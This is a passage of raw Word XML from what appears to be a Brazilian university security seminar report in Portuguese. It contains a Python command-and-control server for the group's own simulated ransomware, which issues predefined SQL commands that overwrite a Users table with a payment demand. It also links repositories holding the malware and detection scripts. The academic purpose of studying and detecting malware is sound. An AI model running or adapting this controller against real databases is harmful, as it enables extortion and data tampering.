    <w:p w14:paraId="15EF94A1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self.end_headers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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2325A4A1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76297A8B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def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do_GET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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F2055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if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self.path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== "/api/v1/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command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":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66981DD7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    self._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set_headers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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BDAD73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    response =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json.dumps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({"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command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":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current_command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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB407A5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self.wfile.write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(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response.encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349609F4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else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B089447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    self._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set_headers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(404)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D624E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self.wfile.write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(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b"Not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Found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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20FD36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3F9EE745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def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do_POST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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B160F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if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self.path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== "/api/v1/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":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A2F0B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content_length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int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(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self.headers.get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("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Content-Length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", 0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B7A8E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    body =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self.rfile.read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(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content_length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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69799751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    data =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json.loads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(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body.decode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AEDEB5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67A2AF40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    print("\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nResultado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recebido do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ransomware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:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A20DC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    print(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data.get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("output", "sem saída"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B865D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449E93F2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    self._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set_headers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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E95EA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self.wfile.write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(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json.dumps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({"status": "Recebido"}).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9F42B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else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248FE5E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    self._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set_headers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(404)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755359CD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self.wfile.write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(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b"Not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Found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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A8FED8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03455134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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def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start_server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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548FC3A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62EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_address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= ("0.0.0.0", 8443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0109BA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httpd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HTTPServer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(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server_address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SimpleHandler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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDEE815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087A3A5C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#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context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ssl.SSLContext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(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ssl.PROTOCOL_TLS_SERVER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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D8EE6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#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context.load_cert_chain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(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certfile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="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cert.pem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",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keyfile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="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key.pem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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFFDF3B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#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httpd.socket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context.wrap_socket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(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httpd.socket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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_side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=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True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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F238D76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21F6B618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print("Servidor de controle iniciado em https://localhost:8443")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B48279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httpd.serve_forever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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE27EE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6C4EDCB4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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if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__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name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__ == "__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main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__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875E05A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62EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_thread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threading.Thread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(target=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start_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EBB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daemon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=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True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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C9305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62EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_thread.start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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210F4BE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1F89F345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pre_defined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= {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46542B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"1": "SHOW TABLES",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717AEA4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"2": "SELECT * FROM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Users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",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293AC2E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"3": "UPDATE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Users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SET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name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= 'Passa o pix comedia'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641626A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"4": "UPDATE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Users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SET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= '01788089111'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569402B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF8C49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32459E1E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while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True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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CFB752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print("\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nComandos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disponíveis:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B89723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for k, v in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pre_defined.items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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AE518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    print(f"{k} - {v}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71839937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print("ou digite um SQL manualmente")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6099C877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print("Digite 'stop' para encerrar\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC763E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2140E96A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option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= input("&gt;&gt;&gt; ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52474686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1369534E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if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option.lower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() == "stop":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD9BE5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    print("Encerrando servidor...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014281C1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    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F786941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elif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option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in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pre_defined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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796ADFE4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current_command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pre_defined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[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option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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141C2E2F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else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18247A66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current_command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option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A784CCF" w14:textId="77777777" w:rsidR="00862EB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349190AB" w14:textId="04276C0E" w:rsidR="00A82F7B" w:rsidRPr="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00862EBB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9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62EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(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f"Comando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> atualizado: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525AB3E2" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00A82F7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F67BA86" w14:textId="7BDFA1A3" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00A82F7B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ANEXO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Links importantes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA6DB73" w14:textId="6539A34E" w:rsidR="00862EBB" w:rsidRPr="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00862EBB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4472C4" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Repositório </w:t>
      </w:r>
      <w:r w:rsidR="000115B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>com o malware e os scripts de detecção</w:t>
      </w:r>
      <w:r w:rsidRPr="00862EB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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/GMTonnera/tac-seguranca-tarefas/tree/main/seminario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957B987" w14:textId="514B634E" w:rsidR="00862EBB" w:rsidRPr="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00862EBB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62EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vídeo da simulação do ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB81C4" w14:textId="4A1CE8AC" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00862EBB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62EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vídeo da detecção do malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7088C1" w14:textId="638BAFFB" w:rsidR="000115B5" w:rsidRPr="00862EBB" w:rsidRDefault="000115B5" w:rsidP="00862EBB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Repositório da API: </w:t>
      </w:r>
      <w:r w:rsidRPr="000115B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/LeandroKornelius/Gym-App-Back-End</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F55D3A2" w14:textId="77777777" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00A82F7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AA4DC86" w14:textId="14A9CA69" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00A82F7B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ANEXO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="000115B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Diagrama do Banco de Dados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEAF417" w14:textId="3D5C1967" w:rsidR="00A82F7B" w:rsidRPr="00DA16FE" w:rsidRDefault="000115B5" w:rsidP="00DA16FE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1475771" wp14:editId="600F93AA">
            <wp:extent cx="5400040" cy="3696970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="410547592" name="Imagem 5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47592" name="Imagem 5" descr="Diagram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5B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A82F7B" w:rsidRPr="00DA16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180F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25A21CB4"/>
    <w:lvl w:ilvl="0" w:tplc="9F2CE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195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FE"/>
    <w:rsid w:val="000115B5"/>
    <w:rsid w:val="00206C32"/>
    <w:rsid w:val="00300E1E"/>
    <w:rsid w:val="00330273"/>
    <w:rsid w:val="003F4C3A"/>
    <w:rsid w:val="006E0A25"/>
    <w:rsid w:val="00855A51"/>
    <w:rsid w:val="00862EBB"/>
    <w:rsid w:val="008E2267"/>
    <w:rsid w:val="00934243"/>
    <w:rsid w:val="009525C4"/>
    <w:rsid w:val="00A53AF3"/>
    <w:rsid w:val="00A82F7B"/>
    <w:rsid w:val="00AB5BE4"/>
    <w:rsid w:val="00CE6FDE"/>
    <w:rsid w:val="00DA16FE"/>
    <w:rsid w:val="00E3279D"/>
    <w:rsid w:val="00E4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A137F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{88049FB8-CC4C-4770-8718-7CC713B7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1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6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6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1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1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16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16F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16F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16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16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16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16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1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1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1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1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16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16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16F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6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16F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16F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A16F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16FE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A82F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7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GMTonnera/tac-seguranca-tarefas/blob/main/seminario/malware/malwarehttp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render3.unb.br/user/view.php?id=71828&amp;course=2517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12</Pages>
  <Words>2783</Words>
  <Characters>15030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Mello Tonnera</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Gustavo Mello Tonnera</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2025-07-15T02:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-11T23:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-15T02:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>